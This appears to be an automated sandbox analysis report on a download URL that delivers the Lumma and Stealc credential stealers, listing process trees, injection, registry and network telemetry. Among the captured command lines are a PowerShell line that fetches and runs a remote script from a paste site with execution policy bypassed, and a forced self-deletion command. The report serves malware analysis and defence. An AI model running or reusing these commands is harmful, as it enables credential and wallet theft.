Malware Analysis Report

2025-08-06 02:51

Sample ID 241015-xxsrgasanh
Target http://relaxrealty.com/download.php
Tags
lumma stealc mainteam credential_access defense_evasion discovery execution spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://relaxrealty.com/download.php was found to be: Known bad.

Malicious Activity Summary

lumma stealc mainteam credential_access defense_evasion discovery execution spyware stealer

Lumma Stealer, LummaC

Stealc

Blocklisted process makes network request

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Unsecured Credentials: Credentials In Files

Indicator Removal: File Deletion

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Program Files directory

Subvert Trust Controls: Mark-of-the-Web Bypass

System Location Discovery: System Language Discovery

Checks processor information in registry

NTFS ADS

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-15 19:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-15 19:14

Reported

2024-10-15 19:20

Platform

win10v2004-20241007-en

Max time kernel

366s

Max time network

304s

Command Line

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://relaxrealty.com/download.php"

Signatures

Lumma Stealer, LummaC

stealer lumma

Stealc

stealer stealc

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Program Files\LDPW\1.exe N/A
N/A N/A C:\Program Files\LDPW\2.exe N/A
N/A N/A C:\Program Files\LDPW\3.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
N/A N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Indicator Removal: File Deletion

defense_evasion

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3552 set thread context of 4300 N/A C:\Program Files\LDPW\1.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2604 set thread context of 4680 N/A C:\Program Files\LDPW\2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2340 set thread context of 3356 N/A C:\Program Files\LDPW\3.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\LDPW\1.exe C:\Users\Admin\Downloads\Installation_x64.exe N/A
File created C:\Program Files\LDPW\2.exe C:\Users\Admin\Downloads\Installation_x64.exe N/A
File created C:\Program Files\LDPW\3.exe C:\Users\Admin\Downloads\Installation_x64.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File created C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\LDPW\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\whoami.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\LDPW\2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\LDPW\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\Installation_x64.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\whoami.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4808 wrote to memory of 2356 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1460 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2356 wrote to memory of 1560 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://relaxrealty.com/download.php"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://relaxrealty.com/download.php

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fbb3ee1-ac94-4752-a103-9a98674122d9} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 2320 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce8d57d-8d2d-45e0-b70c-a7f6a8cb6711} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2996 -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 2984 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27491e52-7cd0-4334-9324-bfcef4ec62d6} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3900 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e03fc959-d716-43fe-bd97-c859f65141a4} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4720 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4712 -prefMapHandle 4704 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e6d5370-193e-442d-947e-a538efabc24f} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5432 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a15102dc-2d22-4e45-83f8-05cdcd42f329} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5416 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1d08f2a-697c-4a98-b75b-b14f6742e415} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 5 -isForBrowser -prefsHandle 5856 -prefMapHandle 5852 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8ecb176-663f-45c7-b5ef-6b9d8e5142d0} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\Installation_x64.exe

"C:\Users\Admin\Downloads\Installation_x64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe"

C:\Program Files\LDPW\1.exe

"C:\Program Files\LDPW\1.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\LDPW\2.exe

"C:\Program Files\LDPW\2.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files\LDPW\3.exe

"C:\Program Files\LDPW\3.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\whoami.exe

"C:\Windows\system32\whoami.exe" /groups /fo csv

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
N/A 127.0.0.1:53871 tcp
US 8.8.8.8:53 relaxrealty.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
FI 95.216.241.251:80 relaxrealty.com tcp
FI 95.216.241.251:80 relaxrealty.com tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 relaxrealty.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
